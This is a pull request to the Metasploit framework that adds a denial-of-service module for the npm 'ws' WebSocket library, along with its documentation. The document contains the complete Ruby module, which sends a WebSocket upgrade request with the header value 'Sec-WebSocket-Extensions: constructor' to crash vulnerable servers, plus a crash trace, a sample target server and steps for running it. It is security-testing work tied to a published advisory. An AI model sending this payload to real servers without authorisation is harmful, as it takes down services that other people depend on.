### PR TITLE
Adding ws DoS module

### DIFF
--- a/documentation/modules/auxiliary/dos/http/ws_dos.md
+++ b/documentation/modules/auxiliary/dos/http/ws_dos.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+ 
+   [ws < 1.1.5 || (2.0.0 , 3.3.1)]
+   (https://nodesecurity.io/advisories/550)
+
+## Vulnerable Analysis
+
+	This module exploits a Denial of Service vulnerability in npm module "ws".
+	By sending a specially crafted value of the Sec-WebSocket-Extensions header 
+	on the initial WebSocket upgrade request, the ws component will crash.
+
+## Verification Steps
+
+1. Start the vulnerable server using the sample server code below `node server.js`
+2. Start `msfconsole`
+3. `use auxiliary/dos/http/ws_dos`
+4. `set RHOST XXX.XXX.XXX.XXX`
+5. `run`
+6. The server should crash
+
+## Options
+
+	None.
+
+## Scenarios
+
+## Server output from crash
+```
+/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40
+    paramsList.push(parsedParams);
+               ^
+
+TypeError: paramsList.push is not a function
+    at value.split.forEach (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40:16)
+    at Array.forEach (<anonymous>)
+    at Object.parse (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:15:20)
+    at WebSocketServer.completeUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:230:30)
+    at WebSocketServer.handleUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:197:10)
+    at Server.WebSocketServer._ultron.on (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:87:14)
+    at emitThree (events.js:136:13)
+    at Server.emit (events.js:217:7)
+    at onParserExecuteCommon (_http_server.js:495:14)
+    at onParserExecute (_http_server.js:450:3)
+```
+
+## Sample server
+```
+const WebSocket = require('ws');
+const wss = new WebSocket.Server(
+{ port: 3000 }
+);
+wss.on('connection', function connection(ws) {
+console.log('connected');
+ws.on('message', function incoming(message)
+{ console.log('received: %s', message); }
+);
+ws.on('error', function (err)
+{ console.error(err); }
+);
+});
+```

--- a/documentation/modules/auxiliary/dos/http/ws_dos.md
+++ b/documentation/modules/auxiliary/dos/http/ws_dos.md
@@ -1,26 +1,22 @@
 ## Vulnerable Application
- 
-   [ws < 1.1.5 || (2.0.0 , 3.3.1)]
-   (https://nodesecurity.io/advisories/550)
+ws < 1.1.5 || (2.0.0 , 3.3.1)
+https://nodesecurity.io/advisories/550
 
 ## Vulnerable Analysis
-
-	This module exploits a Denial of Service vulnerability in npm module "ws".
-	By sending a specially crafted value of the Sec-WebSocket-Extensions header 
-	on the initial WebSocket upgrade request, the ws component will crash.
+This module exploits a Denial of Service vulnerability in npm module "ws".
+By sending a specially crafted value of the Sec-WebSocket-Extensions header 
+on the initial WebSocket upgrade request, the ws component will crash.
 
 ## Verification Steps
-
 1. Start the vulnerable server using the sample server code below `node server.js`
 2. Start `msfconsole`
 3. `use auxiliary/dos/http/ws_dos`
-4. `set RHOST XXX.XXX.XXX.XXX`
+4. `set RHOST <IP>
 5. `run`
 6. The server should crash
 
 ## Options
-
-	None.
+None.
 
 ## Scenarios
 

--- a/documentation/modules/auxiliary/dos/http/ws_dos.md
+++ b/documentation/modules/auxiliary/dos/http/ws_dos.md
@@ -11,7 +11,7 @@ on the initial WebSocket upgrade request, the ws component will crash.
 1. Start the vulnerable server using the sample server code below `node server.js`
 2. Start `msfconsole`
 3. `use auxiliary/dos/http/ws_dos`
-4. `set RHOST <IP>
+4. `set RHOST <IP>`
 5. `run`
 6. The server should crash
 

--- a/modules/auxiliary/dos/http/ws_dos.rb
+++ b/modules/auxiliary/dos/http/ws_dos.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
     req = [
       "GET #{path} HTTP/1.1",
       "Connection: Upgrade",
-      "Sec-WebSocket-Key: test",
+      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(rand(10) + 5).to_s}",
       "Sec-WebSocket-Version: 8",
       "Sec-WebSocket-Extensions: constructor",  #Adding "constructor" as the value for this header causes the DoS
       "Upgrade: websocket",

--- a/modules/auxiliary/dos/http/ws_dos.rb
+++ b/modules/auxiliary/dos/http/ws_dos.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize
+    super(
+      'Name'           => 'ws - Denial of Service',
+      'Description'    => %q{
+          This module exploits a Denial of Service vulnerability in npm module "ws".
+        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.
+      },
+      'References'     =>
+        [
+          ['URL', 'https://nodesecurity.io/advisories/550'],
+          ['CWE', '400'],
+        ],
+      'Author'         =>
+        [
+          'Ryan Knell,  Sonatype Security Research',
+          'Nick Starke, Sonatype Security Research',
+        ],
+      'License'        =>  MSF_LICENSE
+    )
+
+    register_options([
+      Opt::RPORT(3000),
+      OptString.new('TARGETURI', [true, 'The base path', '/']),
+    ],)
+  end
+
+  def run
+    path = datastore['TARGETURI']
+
+    #Create HTTP request
+    req = [
+      "GET #{path} HTTP/1.1",
+      "Connection: Upgrade",
+      "Sec-WebSocket-Key: test",
+      "Sec-WebSocket-Version: 8",
+      "Sec-WebSocket-Extensions: constructor",  #Adding "constructor" as the value for this header causes the DoS
+      "Upgrade: websocket",
+      "\r\n"
+      ].join("\r\n");
+
+    begin
+      connect
+      print_status("Sending DoS packet to #{peer}")
+      sock.put(req)
+
+      data = sock.get_once(-1)  #Attempt to retrieve data from the socket
+
+      if data =~ /101/   #This is the expected HTTP status code. IF it's present, we have a valid upgrade response.
+        print_error("WebSocket Upgrade request Successful, service not vulnerable.")
+      else
+        fail_with(Failure::Unknown, "An unknown error occured")
+      end
+
+      disconnect
+      print_error("DoS packet unsuccessful")
+
+    rescue ::Rex::ConnectionRefused
+      print_error("Unable to connect to #{peer}")
+    rescue ::Errno::ECONNRESET, ::EOFError
+      print_good("DoS packet successful. #{peer} not responding.")
+    end
+  end
+end


### PR DESCRIPTION
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/dos/http/ws_dos`
- [x] Download and install ws version 1.1.4   `npm i ws@1.1.4`
- [x] Start the node server using the code below
- [x] `run` in msf
- [x] To verify it's vulnerable, the node process running the server should crash

This is an example server we tested against
for this vulnerability.
```
const WebSocket = require('ws');
const wss = new WebSocket.Server(
{ port: 3000 }
);
wss.on('connection', function connection(ws) {
console.log('connected');
ws.on('message', function incoming(message)
{ console.log('received: %s', message); }
);
ws.on('error', function (err)
{ console.error(err); }
);
});
```